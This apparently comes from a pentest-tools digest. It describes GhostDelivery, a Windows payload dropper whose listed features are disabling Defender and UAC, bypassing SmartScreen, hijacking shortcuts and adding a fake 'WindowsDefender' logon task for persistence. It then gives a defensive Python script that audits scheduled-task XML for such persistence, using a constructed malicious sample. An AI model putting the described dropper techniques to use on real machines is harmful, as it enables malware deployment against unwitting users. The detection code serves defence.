Downloads the payload to the TEMP directory and executes it to bypass Windows SmartScreen. Disables Defender, UAC/user account control and Defender notifications, injects/creates Command Prompt and Microsoft Edge shortcuts with the payload path (%TEMP%/payload.exe), adds a scheduled task called "WindowsDefender" for the payload to be run at login, and obfuscates the vbs delivery script. This tool also has a serveo function to deliver the obfuscated vbs script.

Light version:
The light version is less noisy and only delivers/executes the payload, creates a scheduled task named "WindowsDefender" to run the payload at login for persistence, and injects/creates Command Prompt and Microsoft Edge shortcuts with the payload path.

Prerequisites/requirements:
* Python 2.7, modules imported in the script (random, sys, string, os, time, base64)

Download GhostDelivery
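The persistence described above, a scheduled task named after Windows Defender whose action runs %TEMP%\payload.exe at logon, is easy to audit because every task is stored as an XML file under the Windows Tasks folder. The script below is an added example for this digest, not code from GhostDelivery: it parses such task definitions and flags actions that run from user-writable locations or that impersonate a Windows component without living in its directory. The two task definitions are constructed (exported without the XML declaration), and the trusted prefixes, user-writable markers and impersonation keywords are assumptions to extend.

```python
r"""Audit Windows scheduled task XML (the files under C:\Windows\System32\Tasks)
for a Defender-like task name whose action runs a binary from a temp folder at logon.

Added example, not code from GhostDelivery. Both task definitions are
constructed; TRUSTED_PREFIXES, USER_WRITABLE and IMPERSONATED_NAMES are assumptions.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Where a genuine Defender/Windows component would run from (assumed).
TRUSTED_PREFIXES = (
    "c:\\program files\\windows defender\\",
    "c:\\programdata\\microsoft\\windows defender\\",
    "c:\\windows\\",
)
# Path fragments that mean "user-writable staging location" (assumed).
USER_WRITABLE = ("%temp%", "\\appdata\\local\\temp\\", "\\temp\\", "\\downloads\\", "\\public\\")
IMPERSONATED_NAMES = re.compile(r"defender|windows ?update|security ?health", re.I)

MALICIOUS_TASK = ("WindowsDefender", r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>DESKTOP-1234\alice</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Users\alice\AppData\Local\Temp\payload.exe</Command></Exec>
  </Actions>
</Task>
""")

LEGIT_TASK = ("Windows Defender Scheduled Scan", r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\Windows Defender\MpCmdRun.exe</Command>
      <Arguments>Scan -ScheduleJob</Arguments>
    </Exec>
  </Actions>
</Task>
""")


def audit_task(name, xml_text):
    """Return the reasons a task looks like planted persistence (empty = clean)."""
    root = ET.fromstring(xml_text.strip())
    reasons = []
    commands = [c.text or "" for c in root.findall(".//t:Exec/t:Command", NS)]
    has_logon_trigger = bool(root.findall(".//t:LogonTrigger", NS))
    for cmd in commands:
        cmd_l = cmd.strip().strip('"').lower()
        if any(marker in cmd_l for marker in USER_WRITABLE):
            reasons.append(f"action runs from a user-writable location: {cmd}")
        if IMPERSONATED_NAMES.search(name) and not cmd_l.startswith(TRUSTED_PREFIXES):
            reasons.append(f"task name '{name}' imitates a Windows component but runs {cmd}")
    if has_logon_trigger and reasons:
        reasons.append("logon trigger re-runs the action at every login")
    return reasons


def audit_tasks(tasks):
    """Map task name -> reasons for every flagged (name, xml) pair."""
    report = {}
    for name, xml_text in tasks:
        reasons = audit_task(name, xml_text)
        if reasons:
            report[name] = reasons
    return report


if __name__ == "__main__":
    for name, reasons in audit_tasks([MALICIOUS_TASK, LEGIT_TASK]).items():
        print(name)
        for r in reasons:
            print("   -", r)
```

The same Command path check applies to the hijacked Command Prompt and Edge shortcuts mentioned above: a .lnk whose target points into %TEMP% is the shortcut-side counterpart of this task.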

Link: http://feedproxy.google.com/~r/PentestTools/~3/oWV8asKvS20/ghostdelivery-this-tool-creates.html